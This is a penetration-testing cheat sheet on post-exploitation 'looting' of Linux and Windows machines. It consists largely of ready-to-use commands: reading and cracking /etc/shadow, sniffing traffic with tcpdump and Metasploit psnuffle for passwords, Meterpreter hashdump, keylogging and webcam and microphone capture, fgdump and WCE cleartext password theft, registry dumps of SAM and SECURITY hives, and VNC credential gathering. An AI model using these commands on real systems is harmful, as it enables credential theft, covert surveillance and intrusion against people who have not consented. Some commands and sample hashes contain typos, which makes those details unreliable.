Loot Linux
Passwords and hashes
First grab the passwd and shadow file.
cat /etc/passwd
cat /etc/shadow
We can crack the password using john the ripper like this:
unshadow passwd shadow > unshadowed.txt
john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
Interesting files
#Meterpreter
search -f *.txt
search -f *.zip
search -f *.doc
search -f *.xls
search -f config*
search -f *.rar
search -f *.docx
search -f *.sql
.ssh:
.bash_history
/var/mail
/var/spool/mail
Tcp-dump
Fast command:
tcpdump -i any -s0 -w capture.pcap
tcpdump -i eth0 -w capture -n -U -s 0 src not 192.168.1.X and dst not 192.168.1.X
tcpdump -vv -i eth0 src not 192.168.1.X and dst not 192.168.1.X
First we need to figure out what interfaces the machine is using: ifconfig. Then we can just start tapping in on that and start to capture those packets.
Commands and flags
Let's start with the basics.
tcpdump - this command will output all network traffic straight to the terminal. Might be hard to understand if there is a lot of traffic.
-A - stands for Ascii, and output it in ascii.
-w file.pcap - the w-flag will save the output into the filename of your choice. The traffic is stored in pcap-format, which is the standard packet-analysis-format.
-i any - will capture traffic for all interfaces.
-D - show list of all interfaces
-q - be less verbose. Be more quiet
-s - The default size that tcpdump captures is only 96 bytes. If you want it to capture more you have to define it yourself -s0 gives you the whole packet.
-c - count. Set how many packets you want to intercept. And then stop. Is useful if you have a non-interactive shell, this way to can capture packets without having to leave with ctr-c.
port 22 - only see traffic on a specific port.
-vvv - Verbose. Depending on how verbose you want the output.
Useful commands
Lots of good stuff here http://www.rationallyparanoid.com/articles/tcpdump.html
tcpdump -i wlan0 -vvv -A | grep "GET"
This will grep all GET from the wlan0 interface. This will not get any SSL-encrypted traffic.
sudo tcpdump -i wlan0 src port 80 or dst port 80 -w port-80-recording.pcap
sudo tcpdump -i eth0 src port 80 or dst port 80 -w port-80-recording.pcap
Print the traffic in hex with ascii interpretation.
tcpdump -nX -r file.pcap
Only record tcp-traffic
tcpdump tcp -w file.pcap
Sniffing for passwords
Once we have dumped some of the traffic we can insert it into metasploit and run psnuffle on it. It can sniff passwords and usernames from pop3, imap, ftp, and HTTP GET. This is a really easy way to find usernames and passwords from traffic that you have already dumped, or are in the process of dumping.
use auxiliary/sniffer/psnuffle
https://www.offensive-security.com/metasploit-unleashed/password-sniffing/
Loot Windows
Meterpreter
If you have a meterpreter shell you are able to do a lot of thing with very little effort. If you do not have a meterpreter-shell you can always create a exploit with msfvenom. An elf or exe or other format to upgrade your shell.
Show help of all commands:
-h
Dump windows hashes for further analysis
hashdump
Keylogger
keysscan_start
keyscan_dump
keyscan_stop
Mic and webcam commands
record_mic Record audio from the default microphone for X seconds
webcam_chat Start a video chat
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
webcam_stream Play a video stream from the specified webcam
Dumping passwords and hashes on windows
This most likely requires administrative rights, that's why the chapter is found here and not in priv-esc. Once you have a hash you can move on to the Password Cracking-chapter where we discuss different techniques of cracking hashes.
Windows stores passwords in SAM - Security Account Manager. Passwords are stored differently depending on the operating system. Up until (and including) Windows 2003 stored the passwords in LAN Manager (LM) and NT LAN Manager (NTLM). LM is incredibly insecure. From windows vista and on the system does not use LM, only NTLM. So it is a bit more secure.
LM and NTLM >= Windows 2003
NTLM > Windows vista
LM Hashes
LM hashes can be really easy to crack. The LM part in the example below is the first part.
Administrator:500:FA21A6D3CF(01B8BAAD3B435B51404EE:C294D192B82B6AA35C3DFCA81F1F59BC:::
Example of NT
Administrator:500:NO PASSWORD*********************:BE134K40129560B46534340292AF4E72:::
fgdump.exe
We can use fgdump.exe (locate fgdump.exe on kali) to extract NTLM and LM Password hashes. Run it and there is a file called 127.0.0.1.pwndump where the hash is saved. Now you can try to brute force it.
Windows Credencial Editor (WCE)
WCE can steal NTLM passwords from memory in cleartext! There are different versions of WCE, one for 32 bit systems and one for 64 bit. So make sure you have the right one.
You can run it like this
wce32.exe -w
Loot registry without tools
This might be a better technique than using tools like wce and fgdump, since you don't have to upload any binaries. Get the registry:
C:\> reg.exe save hklm\sam c:\windows\temp\sam.save
C:\> reg.exe save hklm\security c:\windows\temp\security.save
C:\> reg.exe save hklm\system c:\windows\temp\system.save
The hashes can be extracted using secretdump.py or pwdump
Pwdump 7
http://www.tarasco.org/security/pwdump_7/
VNC
VNC require a specific password to log in to. So it is not the same password as the user password. If you have a meterpreter shell you can run the post exploit module to get the VNC password.
background
use post/windows/gather/credentials/vnc
set session X
exploit
Tcp-dump on winfows
You can use meterpreter to easily take a tcp-dump, like this:
# Meterpreter
run packetrecorder -li
run packetrecorder -i 1
Search for interesting files
#Meterpreter
search -f *.txt
search -f *.zip
search -f *.doc
search -f *.xls
search -f config*
search -f *.rar
search -f *.docx
search -f *.sql
# Recursive search
dir /s
This post references the work from the by sushant747.